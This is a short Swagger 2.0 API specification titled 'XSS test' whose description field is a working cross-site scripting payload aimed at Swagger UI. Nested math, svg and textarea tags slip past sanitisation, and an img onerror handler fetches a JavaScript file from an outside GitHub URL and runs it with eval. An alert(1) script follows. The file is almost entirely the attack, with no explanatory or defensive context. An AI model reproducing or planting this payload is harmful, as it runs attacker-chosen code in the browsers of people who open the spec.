swagger: '2.0'
info:
  title: XSS test
  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src onerror=fetch(`https://raw.githubusercontent.com/Outs1d3r-Net/swagger-ui-xss/main/script.js`).then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1>"><script>alert(1);</script>"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
  version: production
